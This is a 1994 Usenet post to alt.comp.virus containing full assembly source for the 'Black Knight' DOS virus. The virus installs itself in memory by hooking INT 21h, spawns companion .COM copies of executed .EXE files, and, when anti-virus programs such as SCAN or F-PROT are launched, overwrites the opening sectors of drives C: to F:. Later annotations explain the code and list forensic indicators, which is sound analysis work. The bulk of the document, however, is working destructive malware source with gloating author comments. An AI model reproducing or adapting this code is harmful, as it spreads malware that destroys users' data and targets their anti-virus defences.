From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:43:54 1994
Xref: netcom.com alt.comp.virus:508
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: BlackKnight Virus (ANTI AV VIRUS)
Date: 29 Nov 1994 13:09:23 GMT
Organization: Netcom
Lines: 376
Distribution: world
Message-ID: <3bf963$idi@ixnews1.ix.netcom.com>
References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
NNTP-Posting-Host: ix-pas2-10.ix.netcom.com

;Black Knight Anti-Virus-Virus
;Size - 520
;
;Tasm BKNIGHT
;Tlink /T BKNIGHT
;Memory Resident Companion Virus
;Anti-Anti-Virus 
;Formats Drives C: to F: When Anti-Virus Product Is Run
;Tempest - _ Of Luxenburg
;

		; Assembler setup. With .radix 16 in effect, numeric literals written
		; without a suffix further down (e.g. `int 21`, `mov cx,25`,
		; `sub ax,100`) are read as hexadecimal.
		.radix 16
     cseg       segment
		model  small
		assume cs:cseg, ds:cseg, es:cseg

		org 100h

; Work area addressed relative to the label endit, i.e. directly behind the
; code image rather than inside it:
;   oi21        saved INT 21h vector (written in Grab_21, used at Bye_Bye)
;   filelength  byte count from begin to endit; the amount written to disk
;   nameptr     far pointer to the file name of the intercepted call
;   DTA         disk transfer area that the infect routine switches to
oi21            equ endit
filelength      equ endit - begin
nameptr         equ endit+4
DTA             equ endit+8

	 




; Entry point of the image: jumps over the embedded name string.
begin:          jmp     virus_install                              

; Plain-ASCII name string. It lies between begin and endit, so it is part of
; every copy that the infect routine writes and can serve as a static
; indicator when scanning files or memory.
virus_name:            
		db     'Black Knight'
		

						 ;install
; Installation, run once when the image is started.
;   1. Looks at the paragraph just below CS and continues only when its first
;      byte is 5Ah, then lowers the word at offset 3 of that paragraph by 100h.
;      NOTE(review): this matches the DOS memory control block layout ('Z' =
;      last block in the chain, offset 3 = block size in paragraphs), which
;      would cut 4 KB from the end of the program's block - confirm against
;      DOS documentation.
;   2. Copies the image (begin..endit) to offset 0100 of the segment
;      ES + reduced size.
;   3. Saves the current INT 21h vector in oi21 of that copy and points
;      INT 21h at check_exec in the copy.
; Indicators for memory forensics: a shrunken last memory block and an INT 21h
; vector that points into the area above it.
virus_install:  
		nop
		nop
		nop
		mov     ax,cs                    ; reduce memory size   
  
		dec     ax                           
		mov     ds,ax                        
		cmp     byte ptr ds:[0000],5a        
		jne     cancel                        
		mov     ax,ds:[0003]                 
		sub     ax,100                        
		mov     ds:0003,ax
Zopy_virus:  
		mov     bx,ax                    ; copy to claimed block 
 
		mov     ax,es                        
		add     ax,bx                       
		mov     es,ax
		mov     cx,offset endit - begin                    
		mov     ax,ds                       
		inc     ax                      ; DS was CS-1 above, so this is CS again
		mov     ds,ax
		lea     si,ds:[begin]            
		lea     di,es:0100                  
		rep     movsb                       
						    


Grab_21:                                     
		
		; CX is 0 after the rep movsb above, so DS becomes 0000 (interrupt
		; vector table); 0000:0084 is the INT 21h entry (21h * 4).
		mov     ds,cx                   ; hook int 21h
		mov     si,0084h                ; 
		mov     di,offset oi21
		mov     dx,offset check_exec
		lodsw
		; Residency check: only the offset word of the current vector is
		; compared with the offset of check_exec.
		cmp     ax,dx                   ;
		je      cancel                  ; exit, if already 
installed
		stosw                           ; old handler offset  -> ES:oi21
		movsw                           ; old handler segment -> ES:oi21+2
		
		push    es 
		pop     ds
		mov     ax,2521h                ; revector int 21h to 
virus
		nop
		int     21h
		nop                                

cancel:         ret          

; Resident INT 21h handler.
; Saves flags, ES, DS, AX, BX and DX, calls infect only when AX = 4B00h (the
; DOS load-and-execute request; infect treats DS:DX as the program name),
; restores the saved values and then always chains to the original handler
; through the far pointer stored at oi21.
check_exec:     
		pushf

		push    es                     ; push everything onto 
the
		push    ds                     ; stack
		push    ax
		push    bx
		push    dx

		cmp     ax,04B00h               ; is the file being 
		
		
		
		jne     abort                   ; executed?
		
		


					     ;if yes, try the_stinger
do_infect:      call    infect                  ; then try to infect
		
		
			      

abort:                                        ; restore everything
		pop     dx
		pop     bx
		pop     ax
		pop     ds
		pop     es
		popf

Bye_Bye:      
				   ; exit
		jmp     dword ptr cs:[oi21]                     


; Replacement INT 24h (critical error) handler, installed temporarily by the
; Grab24h section of infect. It returns AL = 3 without doing anything else.
; NOTE(review): in the DOS convention AL = 3 means "fail the call", which
; would keep the Abort/Retry/Fail prompt from appearing while the file is
; written (e.g. on a write-protected disk) - confirm against DOS documentation.
new_24h:        
		mov     al,3             ; critical error handler
		iret

; infect - called from check_exec with DS:DX = name of the program being run.
; Sequence, as far as this listing shows:
;   - scans the name for '.' and calls the_stinger, which inspects the
;     characters in front of the dot (trigger for the destructive payload);
;   - records the name pointer, saves the caller's DTA and switches to a
;     private one;
;   - name ends in COM -> do_com; name ends in EXE -> do_exe; else return;
;   - do_exe: rewrites the extension in the caller's buffer to COM, turns
;     Ctrl-Break checking off, installs new_24h as INT 24h handler, creates
;     the .COM file with function 5Bh and writes filelength bytes starting at
;     begin; afterwards restores INT 24h, the break state, the EXE extension
;     and the DTA.
; Artifact on disk: next to NAME.EXE a NAME.COM of exactly filelength bytes
; (the header comment gives the size as 520), created with attribute word 0
; in CX, so it is an ordinary visible file.
infect:          
		mov     cs:[name_seg],ds       ; here, the virus 
essentially
		mov     cs:[name_off],dx       ; copies the name of the
		
		cld                            ; loaded file into a 
buffer
		mov     di,dx                  ; so that it can be 
compared
		push    ds                     ; against the default 
names
		pop     es                     ; in the_stinger
		mov     al,'.'                 ; subroutine 
		repne   scasb                  ; <-- 
		
		; ES:DI now points just past the '.' that ended the scan.
		call    the_stinger            ; check for anti-virus 
load
					       ; and deploy the_stinger
		
		
		
		cld
		mov     word ptr cs:[nameptr],dx
		mov     word ptr cs:[nameptr+2],ds

		mov     ah,2Fh                 ; get current DTA -> ES:BX
		int     21h
		push    es                     ; kept on the stack until `return`
		push    bx

		push    cs

		pop     ds
		mov     dx,offset DTA
		mov     ah,1Ah                 ; set DTA to the private buffer
		int     21h

		call    searchpoint            ; ES:DI -> three-letter extension
		push    di
		mov     si,offset COM_txt

		mov     cx,3
	 rep    cmpsb 
		pop     di
		jz      do_com
		mov     si,offset EXE_txt
		nop
		mov     cl,3
		rep     cmpsb
		jnz     return

do_exe:         mov     si,offset COM_txt
		nop
		call    change_ext             ; caller's name buffer now ends in COM
		mov     ax,3300h               ; get Ctrl-Break checking state
		nop
		int     21h
		push    dx                     ; saved state, restored after return1

		cwd                            ; AX = 3300h is positive, so DX = 0
		inc     ax                     ; AX = 3301h: set state from DL
		push    ax
		int     21h

Grab24h:        
		
		mov     ax,3524h               ; get INT 24h vector -> ES:BX
		int     21h        
		push    bx
		push    es
		push    cs
		pop     ds
		mov     dx,offset new_24h
		mov     ah,25h                 ; set-vector call; assumes AL is still 24h
		push    ax
		int     21h
		
		
		lds     dx,dword ptr [nameptr]  ;create the virus 
(unique name)
		xor     cx,cx
		mov     ah,05Bh                 ; create new file; fails if it exists
		int     21
		jc      return1                 
		xchg    bx,ax                   ;save handle
		


		push    cs
		pop     ds
		mov     cx,filelength          ;cx= length of virus
		mov     dx,offset begin        ;where to start copying
		mov     ah,40h                 ;write the virus to the 
		int     21h                    ;new file

		mov     ah,3Eh                 ; close
		int     21h

		; Pops mirror the pushes in Grab24h: AX = set-vector call,
		; DS:DX = previous INT 24h handler.
return1:        pop     ax
		pop     ds
		pop     dx
		int     21h
		
		; Pops mirror the pushes in do_exe: AX = 3301h, DL = saved break state.
		pop     ax
		pop     dx
		int     21h
		
		mov     si,offset EXE_txt
		call    change_ext             ; put the EXE extension back
		
		; Restores the caller's DTA that was pushed after the 2Fh call.
return:         mov     ah,1Ah
		pop     dx
		pop     ds
		int      21H

		ret

; do_com - reached from infect when the executed name ends in COM.
; findfirst fills the private DTA; the word at DTA+1Ah is compared with the
; image length (NOTE(review): offset 1Ah is the file-size field of the DOS
; find-first record - confirm). On a match the extension in the caller's
; buffer is switched to EXE and findfirst is repeated: if that succeeds the
; name stays EXE, otherwise it is switched back to COM. Every path continues
; at return. The visible effect is that a request to run a COM file of exactly
; this length is handed on to the original INT 21h handler with the EXE name
; whenever such an EXE exists.
do_com:         call    findfirst                 
		cmp     word ptr cs:[DTA+1Ah],endit - begin
		jne     return
		mov     si,offset EXE_txt
		call    change_ext
		call    findfirst
		jnc     return
		mov     si,offset COM_txt
		call    change_ext
		jmp     short return

; searchpoint - loads ES:DI from nameptr, scans forward for the terminating
; 0 byte (CH = 0FFh gives a large count) and steps back 4, which leaves ES:DI
; on the first of the three characters in front of the terminator, i.e. the
; extension of the stored file name.
searchpoint:    les     di,dword ptr cs:[nameptr]
		mov     ch,0FFh
		mov     al,0
	 repnz  scasb
		sub     di,4
		ret
; change_ext - overwrites the extension of the stored file name in place.
; In:  SI = offset of EXE_txt or COM_txt (read with DS = CS).
; Copies 4 bytes (three letters plus the 0 terminator) over the position
; returned by searchpoint. The name buffer belongs to the caller of the
; intercepted INT 21h request, so the change is visible to whatever handles
; that request afterwards.
change_ext:     call    searchpoint
		push    cs
		pop     ds
		movsw
		movsw
		ret

; findfirst - DOS find-first (AH = 4Eh) on the stored file name with
; attribute mask 27h in CL; the result record lands in the current DTA and
; the carry flag reports failure to the caller.
; nameptr is read without a CS override here, so DS must already equal CS
; when this is called.
findfirst:      lds     dx,dword ptr [nameptr]
		mov     cl,27h
		mov     ah,4Eh
		int     21h
		ret
			 
; the_stinger - payload trigger, called from infect with ES:DI just past the
; '.' of the program name.
; The word at [di-3] holds the last two characters of the base name and the
; word at [di-5] the two before them. Two-character constants are stored low
; byte first, so 'MI' matches the text "IM", 'XR' matches "RX", and so on.
; Names whose base part ends in one of the following reach nuke:
;   IM, RX, STOP, AV, PROT, SCAN, LEAN
; Only the tail of the file name is tested; nothing in the file itself is
; examined, so any program whose name ends this way matches.
the_stinger:
		cmp     word ptr es:[di-3],'MI'    ;Integrity Master
		je      jumptoass                
		
		cmp     word ptr es:[di-3],'XR'    ;VIRX
		je      jumptoass                
		
		cmp     word ptr es:[di-3],'PO'    ;VIRUSTOP
		jne     next1                     
		cmp     word ptr es:[di-5],'TS'   
		je      jumptoass                

next1:          cmp     word ptr es:[di-3],'VA'    ;AV = CPAV
		je      jumptoass                     
		
		cmp     word ptr es:[di-3],'TO'    ;*prot = F-prot
		jne     next2                
		cmp     word ptr es:[di-5],'RP'  
		je      jumptoass                     

next2:          cmp     word ptr es:[di-3],'NA'    ;*scan = McAfee's 
Scan.
		jne     next3                
		cmp     word ptr es:[di-5],'CS'  
		je      jumptoass                     
		
		cmp     word ptr es:[di-3],'NA'    ;*lean = McAfee's 
CLEAN.
		jne     next3                      ; why not, eh?
		cmp     word ptr es:[di-5],'EL'  
		je      jumptoass                     
next3:          ret                
; The original comment below speaks of deleting the anti-virus program; the
; jump target nuke performs absolute disk writes and no file deletion.
jumptoass:      jmp     nuke                  ;assassination (deletion)
						; of anti-virus program

		
		
; nuke - destructive payload, reached from the_stinger.
; Four near-identical blocks, each: AL = drive number, CX = 25 sectors (25h,
; because .radix 16 is in effect), CWD clears DX because AH still holds 4Bh
; from the intercepted request (start sector 0), then INT 26h (DOS absolute
; disk write).
; The header comment calls this "formatting"; what the listing shows is an
; overwrite of the first sectors of each volume with whatever memory DS:BX
; points at. NOTE(review): that range presumably covers the boot sector and
; the start of the FAT while file data further in is not written, which
; matters for recovery - confirm against the layout of the affected volume.
; The listing has no return after the last block; execution runs on into the
; data bytes at EXE_txt.
nuke:                
		mov     al,2                   ;Lets Total The C: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         

		mov     al,3                   ;Lets Total The D: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         

		; NOTE(review): AL repeats the value of the previous block, so the
		; comment on the next line and the code disagree.
		mov     al,3                   ;Lets Total The E: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         


		mov     al,5                   ;Lets Total The F: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         


; Extension strings that change_ext copies over the caller's file name
; (4 bytes each, including the terminating 0).
EXE_txt         db  'EXE',0
COM_txt         db  'COM',0

 

; data_1, data_2, last and c1..c5 are not referenced anywhere in this listing.
data_1          db      0
data_2          db      0

last            db     090H
; Segment and offset of the program name, stored at the top of infect.
name_seg        dw  ?
name_off        dw  ?

c1              db       0          
c2              db       0          
c3              db       0          
c4              db       0          
c5              db       0          
; Author signature string. Like virus_name it lies between begin and endit,
; so it is present in every written copy and is a second static indicator.
virus_man:      db      'Tempest - _ Of Luxenburg'
			   
; End of the image; oi21, nameptr and DTA are addressed relative to this label.
endit:


cseg            ends
		end begin